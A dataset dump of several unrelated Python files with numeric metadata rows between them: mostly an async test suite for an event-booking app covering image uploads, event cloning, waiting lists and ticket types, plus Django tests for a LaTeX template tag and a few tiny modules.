'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
'Origin': f'http://127.0.0.1:{cli.server.port}',
},
)
assert r.status == 200, await r.text()
img_path = await db_conn.fetchval('SELECT secondary_image FROM events')
assert img_path == RegexStr(
r'https://testingbucket.example.org/tests/testing/supper-clubs/the-event-name/secondary/\w+/main.png'
)
assert dummy_server.app['log'] == [
RegexStr(
r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/'
r'supper-clubs/the-event-name/secondary/\w+/main.png'
),
]
async def test_secondary_image_exists(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
img_url = f'https://{event_path}/secondary/xxx123/main.png'
await db_conn.execute('update events set secondary_image=$1', img_url)
data = FormData()
data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
r = await cli.post(
url('event-set-image-secondary', id=factory.event_id),
data=data,
headers={
'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
'Origin': f'http://127.0.0.1:{cli.server.port}',
},
)
assert r.status == 200, await r.text()
assert sorted(dummy_server.app['log']) == [
f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/main.png',
f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/thumb.png',
RegexStr(rf'PUT aws_endpoint_url/{event_path}/secondary/\w+/main.png'),
]
async def test_remove_secondary_image_(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
img_url = f'https://{event_path}/secondary/xxx123/main.png'
await db_conn.execute('update events set secondary_image=$1', img_url)
r = await cli.json_post(url('event-remove-image-secondary', id=factory.event_id))
assert r.status == 200, await r.text()
assert sorted(dummy_server.app['log']) == [
f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/main.png',
f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/thumb.png',
]
assert None is await db_conn.fetchval('select secondary_image from events where id=$1', factory.event_id)
r = await cli.json_post(url('event-remove-image-secondary', id=factory.event_id))
assert r.status == 200, await r.text()
assert sorted(dummy_server.app['log']) == [
f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/main.png',
f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/thumb.png',
]
assert None is await db_conn.fetchval('select secondary_image from events where id=$1', factory.event_id)
async def test_description_image(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
data = FormData()
data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
r = await cli.post(
url('event-set-image-description', id=factory.event_id),
data=data,
headers={
'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
'Origin': f'http://127.0.0.1:{cli.server.port}',
},
)
assert r.status == 200, await r.text()
img_path = await db_conn.fetchval('SELECT description_image FROM events')
assert img_path == RegexStr(
r'https://testingbucket.example.org/tests/testing/supper-clubs/the-event-name/description/\w+/main.png'
)
assert sorted(dummy_server.app['log']) == [
RegexStr(
r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/'
r'supper-clubs/the-event-name/description/\w+/main.png'
),
RegexStr(
r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/'
r'supper-clubs/the-event-name/description/\w+/thumb.png'
),
]
async def test_description_image_exists(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
img_url = f'https://{event_path}/description/xxx123/main.png'
await db_conn.execute('update events set description_image=$1', img_url)
data = FormData()
data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
r = await cli.post(
url('event-set-image-description', id=factory.event_id),
data=data,
headers={
'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
'Origin': f'http://127.0.0.1:{cli.server.port}',
},
)
assert r.status == 200, await r.text()
assert sorted(dummy_server.app['log']) == [
f'DELETE aws_endpoint_url/{event_path}/description/xxx123/main.png',
f'DELETE aws_endpoint_url/{event_path}/description/xxx123/thumb.png',
RegexStr(rf'PUT aws_endpoint_url/{event_path}/description/\w+/main.png'),
RegexStr(rf'PUT aws_endpoint_url/{event_path}/description/\w+/thumb.png'),
]
async def test_remove_description_image_(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
img_url = f'https://{event_path}/description/xxx123/main.png'
await db_conn.execute('update events set description_image=$1', img_url)
r = await cli.json_post(url('event-remove-image-description', id=factory.event_id))
assert r.status == 200, await r.text()
assert sorted(dummy_server.app['log']) == [
f'DELETE aws_endpoint_url/{event_path}/description/xxx123/main.png',
f'DELETE aws_endpoint_url/{event_path}/description/xxx123/thumb.png',
]
assert None is await db_conn.fetchval('select description_image from events where id=$1', factory.event_id)
r = await cli.json_post(url('event-remove-image-description', id=factory.event_id))
assert r.status == 200, await r.text()
assert sorted(dummy_server.app['log']) == [
f'DELETE aws_endpoint_url/{event_path}/description/xxx123/main.png',
f'DELETE aws_endpoint_url/{event_path}/description/xxx123/thumb.png',
]
assert None is await db_conn.fetchval('select description_image from events where id=$1', factory.event_id)
async def test_clone_event(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(
name='First Event',
ticket_limit=42,
public=False,
status='pending',
short_description='this is short',
long_description='this is long',
description_intro='this is some intro texxxt',
)
await login()
data = dict(
name='New Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published',
)
r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
assert r.status == 201, await r.text()
assert await db_conn.fetchval('select count(*) from events where id!=$1', factory.event_id) == 1
new_event_id = await db_conn.fetchval('select id from events where id!=$1', factory.event_id)
assert await r.json() == {'id': new_event_id}
data = await db_conn.fetchrow('select * from events where id=$1', new_event_id)
assert dict(data) == {
'id': new_event_id,
'category': factory.category_id,
'status': 'published',
'host': factory.user_id,
'name': 'New Event',
'slug': 'new-event',
'highlight': False,
'allow_tickets': True,
'allow_donations': False,
'external_ticket_url': None,
'external_donation_url': None,
'start_ts': datetime(2032, 2, 1, 19, 0, tzinfo=timezone.utc),
'timezone': 'Europe/London',
'duration': timedelta(0, 7200),
'youtube_video_id': None,
'short_description': 'this is short',
'long_description': 'this is long',
'description_intro': 'this is some intro texxxt',
'description_image': None,
'public': False,
'location_name': None,
'location_lat': None,
'location_lng': None,
'ticket_limit': 42,
'donation_target': None,
'tickets_taken': 0,
'image': None,
'secondary_image': None,
}
assert await db_conn.fetchval('select count(*) from ticket_types where event=$1', new_event_id) == 3
async def test_clone_event_ticket_types(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
event_id = await factory.create_event()
await db_conn.execute(
"""
insert into ticket_types (event, name, price, slots_used) values
($1, 'foo', 123, 3),
($1, 'bar', 54.32, null)
""",
event_id,
)
assert await db_conn.fetchval('select count(*) from ticket_types where event=$1', event_id) == 5
await login()
data = dict(
name='New Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published',
)
r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
assert r.status == 201, await r.text()
assert await db_conn.fetchval('select count(*) from events where id!=$1', factory.event_id) == 1
new_event_id = (await r.json())['id']
ticket_types = await db_conn.fetch(
'select event, name, price, slots_used, mode, custom_amount from ticket_types where event=$1 order by id',
new_event_id,
)
assert [dict(r) for r in ticket_types] == [
{
'event': new_event_id,
'name': 'Standard',
'price': None,
'slots_used': 1,
'mode': 'ticket',
'custom_amount': False,
},
{
'event': new_event_id,
'name': 'Standard',
'price': Decimal('10.00'),
'slots_used': 1,
'mode': 'donation',
'custom_amount': False,
},
{
'event': new_event_id,
'name': 'Custom Amount',
'price': None,
'slots_used': 1,
'mode': 'donation',
'custom_amount': True,
},
{
'event': new_event_id,
'name': 'foo',
'price': Decimal('123.00'),
'slots_used': 3,
'mode': 'ticket',
'custom_amount': False,
},
{
'event': new_event_id,
'name': 'bar',
'price': Decimal('54.32'),
'slots_used': None,
'mode': 'ticket',
'custom_amount': False,
},
]
async def test_clone_event_slug(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(name='Event', slug='event', status='pending', highlight=True)
await login()
data = dict(name='Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published')
r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
assert r.status == 201, await r.text()
h, name, slug = await db_conn.fetchrow('select highlight, name, slug from events where status=$1', 'published')
assert h is True
assert name == 'Event'
assert re.fullmatch('event-....', slug)
async def test_clone_event_guest(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
await login()
data = dict(name='Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published')
r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
assert r.status == 403, await r.text()
async def test_clone_event_not_found(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(name='Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published')
r = await cli.json_post(url('event-clone', id=123), data=data)
assert r.status == 404, await r.text()
async def test_edit_waiting_list(cli, url, db_conn, factory: Factory, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
ben = await factory.create_user(first_name='ben', last_name='ben', email='ben@example.org')
await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', factory.event_id, ben)
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=12))
assert r.status == 200, await r.text()
assert await db_conn.fetchval('SELECT ticket_limit FROM events') == 12
assert len(dummy_server.app['emails']) == 1
email = dummy_server.app['emails'][0]
assert email['To'] == 'ben ben <ben@example.org>'
assert email['Subject'] == 'The Event Name - New Tickets Available'
assert 'trigger=event-tickets-available' in email['X-SES-MESSAGE-TAGS']
async def test_waiting_list_remove(cli, url, db_conn, factory: Factory, settings):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
event_id = await factory.create_event()
ben = await factory.create_user(first_name='ben', last_name='ben', email='ben@example.org')
await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', event_id, ben)
query = {'sig': waiting_list_sig(event_id, ben, settings)}
r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben, query=query), allow_redirects=False)
assert r.status == 307, await r.text()
assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/waiting-list-removed/'
assert await db_conn.fetchval('select count(*) from waiting_list') == 0
async def test_waiting_list_remove_wrong(cli, url, db_conn, factory: Factory, settings):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
event_id = await factory.create_event()
ben = await factory.create_user(first_name='ben', last_name='ben', email='ben@example.org')
await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', event_id, ben)
r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben), allow_redirects=False)
assert r.status == 307, await r.text()
assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/unsubscribe-invalid/'
assert await db_conn.fetchval('select count(*) from waiting_list') == 1
query = {'sig': 'wrong'}
r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben, query=query), allow_redirects=False)
assert r.status == 307, await r.text()
assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/unsubscribe-invalid/'
assert await db_conn.fetchval('select count(*) from waiting_list') == 1
query = {'sig': waiting_list_sig(event_id + 1, ben, settings)}
r = await cli.get(url('event-waiting-list-remove', id=event_id, user_id=ben, query=query), allow_redirects=False)
assert r.status == 307, await r.text()
assert r.headers['Location'] == f'http://127.0.0.1:{cli.server.port}/unsubscribe-invalid/'
assert await db_conn.fetchval('select count(*) from waiting_list') == 1
async def test_event_allow_donation(cli, url, dummy_server, factory: Factory, login, db_conn):
await factory.create_company()
await factory.create_cat(slug='testing')
await factory.create_user()
await factory.create_event(allow_tickets=False, slug='evt', allow_donations=True, status='published')
r = await cli.get(url('event-get-public', category='testing', event='evt'))
assert r.status == 200, await r.text()
data = await r.json()
assert data['event']['allow_tickets'] is False
assert data['event']['allow_donations'] is True
assert data['ticket_types'] == [
{'name': 'Standard', 'price': 10, 'mode': 'donation'},
{'name': 'Standard', 'price': None, 'mode': 'ticket'},
]
async def test_create_event_mode(cli, url, db_conn, factory: Factory, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
mode='both',
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': None},
timezone='Europe/London',
long_description='hello',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
assert (allow_tickets, allow_donations) == (True, True)
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_edit_event_mode(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(allow_tickets=True, allow_donations=False)
await login()
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(mode='donations'))
assert r.status == 200, await r.text()
allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
assert (allow_tickets, allow_donations) == (False, True)
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(mode='both'))
assert r.status == 200, await r.text()
allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
assert (allow_tickets, allow_donations) == (True, True)
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_donation_tt_updates(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat(slug='cat')
await factory.create_user()
await factory.create_event(slug='evt', status='published')
await login()
r = await cli.get(url('event-get-public', category='cat', event='evt'))
assert r.status == 200, await r.text()
data = await r.json()
assert data['ticket_types'] == [
{'name': 'Standard', 'price': 10, 'mode': 'donation'},
{'name': 'Standard', 'price': None, 'mode': 'ticket'},
]
tt_id = await db_conn.fetchval("SELECT id FROM ticket_types where mode='donation' and not custom_amount")
ticket_types = [
{'id': tt_id, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'donation'},
{'name': 'new', 'price': 44, 'active': True, 'slots_used': 1, 'mode': 'donation'},
]
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
assert r.status == 200, await r.text()
r = await cli.get(url('event-get-public', category='cat', event='evt'))
assert r.status == 200, await r.text()
data = await r.json()
assert data['ticket_types'] == [
{'mode': 'donation', 'name': 'new', 'price': 44},
{'name': 'foobar', 'price': 123, 'mode': 'donation'},
{'name': 'Standard', 'price': None, 'mode': 'ticket'},
]
async def test_tt_updates_invalid(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat(slug='cat')
await factory.create_user()
await factory.create_event(slug='evt', status='published')
await login()
tt_id1 = await db_conn.fetchval("SELECT id FROM ticket_types where mode='donation' and not custom_amount")
tt_id2 = await db_conn.fetchval("SELECT id FROM ticket_types where mode='ticket'")
ticket_types = [
{'id': tt_id1, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'donation'},
{'id': tt_id2, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'ticket'},
]
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
assert r.status == 400, await r.text()
assert await r.json() == {'message': 'all ticket types must have the same mode'}
async def test_tt_updates_change(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat(slug='cat')
await factory.create_user()
await factory.create_event(slug='evt', status='published')
await login()
tt_id = await db_conn.fetchval("SELECT id FROM ticket_types where mode='ticket'")
ticket_types = [
{'id': tt_id, 'name': 'foobar', 'price': 123, 'active': True, 'slots_used': 1, 'mode': 'donation'},
]
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
assert r.status == 400, await r.text()
assert await r.json() == {'message': 'ticket type modes should not change'}
r = await cli.get(url('event-get-public', category='cat', event='evt'))
assert r.status == 200, await r.text()
data = await r.json()
assert data['ticket_types'] == [
{'name': 'Standard', 'price': 10, 'mode': 'donation'},
{'name': 'Standard', 'price': None, 'mode': 'ticket'},
]
| 39.065667
| 120
| 0.644475
| 10,191
| 75,553
| 4.614562
| 0.0419
| 0.080635
| 0.118655
| 0.043039
| 0.887979
| 0.855828
| 0.824994
| 0.800519
| 0.786208
| 0.773619
| 0
| 0.020202
| 0.209853
| 75,553
| 1,933
| 121
| 39.085877
| 0.767547
| 0.000569
| 0
| 0.667082
| 0
| 0.006223
| 0.253614
| 0.043306
| 0
| 0
| 0
| 0
| 0.166148
| 1
| 0
| false
| 0
| 0.005601
| 0
| 0.005601
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5a6ef040df6044245191e961aa7db56540fd9689
| 62
|
py
|
Python
|
examples/__init__.py
|
sheepy0125/hisock
|
177b172032837f17567e80426bae0e3ec79016b7
|
[
"MIT"
] | null | null | null |
examples/__init__.py
|
sheepy0125/hisock
|
177b172032837f17567e80426bae0e3ec79016b7
|
[
"MIT"
] | 1
|
2021-09-03T14:22:15.000Z
|
2021-09-03T14:22:15.000Z
|
examples/__init__.py
|
sheepy0125/hisock
|
177b172032837f17567e80426bae0e3ec79016b7
|
[
"MIT"
] | null | null | null |
import examples.basic
import examples.tictactoe
del examples
| 12.4
| 25
| 0.854839
| 8
| 62
| 6.625
| 0.625
| 0.528302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112903
| 62
| 4
| 26
| 15.5
| 0.963636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5a829f45c7b4e91800daf3cf949681b8b6011fe5
| 40
|
py
|
Python
|
test.py
|
PanggNOTlovebean/TimeseriesTransformer
|
ab7aa0bc638dc3cbb83a26c037573c9a60055531
|
[
"MIT"
] | null | null | null |
test.py
|
PanggNOTlovebean/TimeseriesTransformer
|
ab7aa0bc638dc3cbb83a26c037573c9a60055531
|
[
"MIT"
] | null | null | null |
test.py
|
PanggNOTlovebean/TimeseriesTransformer
|
ab7aa0bc638dc3cbb83a26c037573c9a60055531
|
[
"MIT"
] | null | null | null |
import numpy as np
print(np.__version__)
| 20
| 21
| 0.825
| 7
| 40
| 4.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 2
| 21
| 20
| 0.805556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
ceab3fff7f588e212d7b18deba285ef57e77696b
| 7,829
|
py
|
Python
|
latexify/tests.py
|
AmmsA/django-latexify
|
2beb04d9b16229ab2469c2920c3426f67030f2eb
|
[
"MIT"
] | 27
|
2016-06-20T08:44:38.000Z
|
2018-08-22T16:33:47.000Z
|
latexify/tests.py
|
AmmsA/django-latexify
|
2beb04d9b16229ab2469c2920c3426f67030f2eb
|
[
"MIT"
] | 4
|
2016-10-17T17:52:32.000Z
|
2018-05-04T12:29:05.000Z
|
latexify/tests.py
|
AmmsA/django-latexify
|
2beb04d9b16229ab2469c2920c3426f67030f2eb
|
[
"MIT"
] | 9
|
2017-01-07T14:42:42.000Z
|
2018-09-14T21:12:34.000Z
|
from __future__ import unicode_literals
from django.test import TestCase
from django.template import Context, Template
from django.template import TemplateSyntaxError
class LatexifyTests(TestCase):
def tag_test(self, template, context, output):
t = Template("{}{}".format('{% load latexify %}', template))
c = Context(context)
self.assertEqual(t.render(c), output)
def test__normal_text(self):
template = '{% latexify test_text %}'
context = {'test_text': 'hello world'}
output = '<span class="django-latexify text">hello world</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_and_no_math_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': 'hello world'}
output = '<span class="django-latexify text">hello world</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_and_inline_math_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$f(x)=\sqrt(2)\$'}
output = '<span class="django-latexify text">' \
'<span class="django-latexify math inline">' \
'f(x)=\\sqrt(2)</span>' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_and_block_math_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$$f(x)=\sqrt(2)\$$'}
output = '<span class="django-latexify text">' \
'<span class="django-latexify math block">' \
'f(x)=\\sqrt(2)</span>' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_and_block_and_inline_math_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$$f(x)=\sqrt(4)\$$ is \$f(x)=2\$'}
output = '<span class="django-latexify text">' \
'<span class="django-latexify math block">' \
'f(x)=\\sqrt(4)</span> is ' \
'<span class="django-latexify math inline">f(x)=2</span>' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_and_inline_and_block_math_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$f(x)=\sqrt(4)\$ is \$$f(x)=2\$$'}
output = '<span class="django-latexify text">' \
'<span class="django-latexify math inline">' \
'f(x)=\\sqrt(4)</span> is ' \
'<span class="django-latexify math block">f(x)=2</span>' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_not_closed_inline_math_tag_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$f(x)=\sqrt(4)'}
output = '<span class="django-latexify text">\\$f(x)=\\sqrt(4)</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_not_closed_block_math_tag_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$$f(x)=\sqrt(4)'}
output = '<span class="django-latexify text">' \
'\\$$f(x)=\\sqrt(4)' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_unmatching_math_tags_in_text(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$$f(x)=\sqrt(4)\$'}
output = '<span class="django-latexify text">' \
'\\$$f(x)=\\sqrt(4)\\$' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_unmatching_math_tags_reversed(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$f(x)=\sqrt(4)\$$'}
output = '<span class="django-latexify text">' \
'\\$f(x)=\\sqrt(4)\\$$' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_inline_tag_inside_block_tag(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$$g(x)=\$\sqrt(9)\$\$$'}
output = '<span class="django-latexify text">' \
'\\$$g(x)=\\$\\sqrt(9)\\$\\$$' \
'</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_block_tag_inside_inline_tag(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text': '\$y(x)=\$$\sqrt(16)\$$\$'}
out = '<span class="django-latexify text">' \
'\\$y(x)=\\$$\\sqrt(16)\\$$\\$' \
'</span>'
self.tag_test(template, context, out)
def test__parse_math_is_true_normal_text_then_block_tag(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text':
'The following math eq: \$$y(x)=\sqrt(16)\$$ is complete'}
output = '<span class="django-latexify text">' \
'The following math eq: ' \
'<span class="django-latexify math block">' \
'y(x)=\\sqrt(16)</span>' \
' is complete</span>'
self.tag_test(template, context, output)
def test__parse_math_is_true_normal_text_then_inline_tag(self):
template = '{% latexify test_text parse_math=True %}'
context = {'test_text':
'The following math eq: \$y(x)=\sqrt(16)\$ is complete'}
output = '<span class="django-latexify text">' \
'The following math eq: ' \
'<span class="django-latexify math inline">' \
'y(x)=\\sqrt(16)</span>' \
' is complete</span>'
self.tag_test(template, context, output)
def test__both_inline_and_block_args_are_true(self):
template = '{% latexify test_text math_inline=True math_block=True %}'
context = {'test_text':
'The following math eq: \$y(x)=\sqrt(16)\$ is complete'}
output = '<span class="django-latexify math inline">' \
'The following math eq: ' \
'\\$y(x)=\\sqrt(16)\\$ is complete' \
'</span>'
self.tag_test(template, context, output)
def test__math_block_set_true(self):
template = '{% latexify test_text math_block=True %}'
context = {'test_text':
'The following math eq: \$$y(x)=\sqrt(16)\$$ is complete'}
output = '<span class="django-latexify math block">' \
'The following math eq: ' \
'\\$$y(x)=\\sqrt(16)\\$$ ' \
'is complete</span>'
self.tag_test(template, context, output)
def test__latex_css_is_specified(self):
template = '{% latexify test_text latex_css="my_css_class" %}'
context = {'test_text':
'Hello world'}
output = '<span class="django-latexify my_css_class">' \
'Hello world' \
'</span>'
self.tag_test(template, context, output)
def test__value_from_setting(self):
template = '{% value_from_settings "LATEX_MATH_INLINE_CSS_CLASS" %}'
context = {}
output = 'django-latexify math inline'
self.tag_test(template, context, output)
def test__value_from_setting_no_arg(self):
with self.assertRaises(TemplateSyntaxError):
template = '{% value_from_settings %}'
context = {}
output = ''
self.tag_test(template, context, output)
| 44.994253
| 78
| 0.569166
| 930
| 7,829
| 4.516129
| 0.078495
| 0.064762
| 0.089286
| 0.136905
| 0.852619
| 0.832381
| 0.796905
| 0.780714
| 0.778095
| 0.76619
| 0
| 0.007365
| 0.271554
| 7,829
| 173
| 79
| 45.254335
| 0.72909
| 0
| 0
| 0.573333
| 0
| 0
| 0.38549
| 0.124154
| 0
| 0
| 0
| 0
| 0.013333
| 1
| 0.133333
| false
| 0
| 0.026667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0c9f42994e6e22c376a892601d29f9164a66c49b
| 40
|
py
|
Python
|
molpy/algorithms/__init__.py
|
kylincaster/molpy
|
39304733570d62613bd7708834d2185bcce4ae86
|
[
"BSD-3-Clause"
] | 6
|
2021-11-04T12:28:44.000Z
|
2021-12-22T13:49:52.000Z
|
molpy/algorithms/__init__.py
|
kylincaster/molpy
|
39304733570d62613bd7708834d2185bcce4ae86
|
[
"BSD-3-Clause"
] | 2
|
2021-11-26T12:06:24.000Z
|
2021-11-28T11:03:11.000Z
|
molpy/algorithms/__init__.py
|
kylincaster/molpy
|
39304733570d62613bd7708834d2185bcce4ae86
|
[
"BSD-3-Clause"
] | 4
|
2021-11-04T10:36:51.000Z
|
2021-12-17T11:58:47.000Z
|
from molpy.algorithms.traversal import *
| 40
| 40
| 0.85
| 5
| 40
| 6.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 40
| 1
| 40
| 40
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0cbd3fc9dcec7649c2e4f4385831a4e1a042e2ad
| 52
|
py
|
Python
|
spark/pi-v1/model/calculate_pi.py
|
PipelineAI/models
|
d8df07877aa8b10ce9b84983bb440af75e84dca7
|
[
"Apache-2.0"
] | 44
|
2017-11-17T06:19:05.000Z
|
2021-11-03T06:00:56.000Z
|
spark/pi-v1/model/calculate_pi.py
|
PipelineAI/models
|
d8df07877aa8b10ce9b84983bb440af75e84dca7
|
[
"Apache-2.0"
] | 3
|
2018-08-09T14:28:17.000Z
|
2018-09-10T03:32:42.000Z
|
spark/pi-v1/model/calculate_pi.py
|
PipelineAI/models
|
d8df07877aa8b10ce9b84983bb440af75e84dca7
|
[
"Apache-2.0"
] | 21
|
2017-11-18T15:12:12.000Z
|
2020-08-15T07:08:33.000Z
|
def calculate(count, n):
return 4.0 * count / n
| 17.333333
| 26
| 0.615385
